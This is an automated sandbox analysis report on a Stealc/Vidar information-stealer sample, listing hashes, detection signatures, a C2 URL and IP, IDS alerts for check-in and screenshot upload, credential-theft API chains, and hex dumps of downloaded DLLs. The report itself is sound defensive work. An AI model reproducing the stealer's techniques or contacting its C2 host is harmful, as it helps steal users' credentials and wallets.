Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe

Overview

General Information

Sample name:5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe
Analysis ID:1538409
MD5:217e6aff108174a9a90022c19f8e5f8f
SHA1:a46822575426c3fac79c55f9cf9f8adb907ec58b
SHA256:5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717ceebaa28e2f865471e6
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://147.45.44.221/28166bd28a5d19e6.php", "Botnet": "nfzeonwcituc"}
{"C2 url": "http://147.45.44.221/28166bd28a5d19e6.php", "Botnet": "nfzeonwcituc"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1843071659.0000000002500000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1842034533.00000000021D6000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1843071659.000000000227A000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            1.2.BitLockerToGo.exe.2750000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.227a000.5.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.2418000.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe.23ca000.4.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 3 entries
                      No Sigma rule has matched
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-21T08:47:18.076775+020020442451Malware Command and Control Activity Detected147.45.44.22180192.168.2.449732TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-21T08:47:18.070651+020020442441Malware Command and Control Activity Detected192.168.2.449732147.45.44.22180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-21T08:47:18.325741+020020442461Malware Command and Control Activity Detected192.168.2.449732147.45.44.22180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-21T08:47:33.801751+020020442491Malware Command and Control Activity Detected192.168.2.449732147.45.44.22180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-21T08:47:18.905321+020020442481Malware Command and Control Activity Detected192.168.2.449732147.45.44.22180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-21T08:47:18.332442+020020442471Malware Command and Control Activity Detected147.45.44.22180192.168.2.449732TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-21T08:47:17.815806+020020442431Malware Command and Control Activity Detected192.168.2.449732147.45.44.22180TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-10-21T08:47:19.968265+020028033043Unknown Traffic192.168.2.449732147.45.44.22180TCP
                      2024-10-21T08:47:26.005541+020028033043Unknown Traffic192.168.2.449732147.45.44.22180TCP
                      2024-10-21T08:47:27.705002+020028033043Unknown Traffic192.168.2.449732147.45.44.22180TCP
                      2024-10-21T08:47:28.963477+020028033043Unknown Traffic192.168.2.449732147.45.44.22180TCP
                      2024-10-21T08:47:29.735457+020028033043Unknown Traffic192.168.2.449732147.45.44.22180TCP
                      2024-10-21T08:47:31.542241+020028033043Unknown Traffic192.168.2.449732147.45.44.22180TCP
                      2024-10-21T08:47:32.089369+020028033043Unknown Traffic192.168.2.449732147.45.44.22180TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://147.45.44.221/28166bd28a5d19e6.php", "Botnet": "nfzeonwcituc"}
                      Source: 00000000.00000002.1843071659.0000000002418000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://147.45.44.221/28166bd28a5d19e6.php", "Botnet": "nfzeonwcituc"}
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeReversingLabs: Detection: 52%
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeVirustotal: Detection: 54%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02759B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_02759B60
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02757240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_02757240
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02759AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_02759AC0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02768EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_02768EA0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275C820 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,1_2_0275C820
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_6C806C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6C806C80
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                      Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                      Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                      Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                      Source: Binary string: BitLockerToGo.pdb source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                      Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                      Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                      Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                      Source: Binary string: BitLockerToGo.pdbGCTL source: 5ffe9c7df144e58c04f8d77c33849dcf93dc0ada47717.exe, 00000000.00000002.1843071659.000000000223F000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0275BE70
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_027516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_027516D0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0275F6B0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02763EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_02763EA0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0275DA80
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0275E430
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02764910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02764910
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0275DE10
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_027638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_027638B0
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02764570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_02764570
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_0275ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0275ED20
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                      Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 147.45.44.221:80
                      Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49732 -> 147.45.44.221:80
                      Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 147.45.44.221:80 -> 192.168.2.4:49732
                      Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49732 -> 147.45.44.221:80
                      Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 147.45.44.221:80 -> 192.168.2.4:49732
                      Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49732 -> 147.45.44.221:80
                      Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49732 -> 147.45.44.221:80
                      Source: Malware configuration extractorURLs: http://147.45.44.221/28166bd28a5d19e6.php
                      Source: Malware configuration extractorURLs: http://147.45.44.221/28166bd28a5d19e6.php
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:19 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 12:30:30 GMTETag: "10e436-5e7ed3ec64580"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "a7550-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 21 Oct 2024 06:47:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "94750-5e7ea271b0900"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 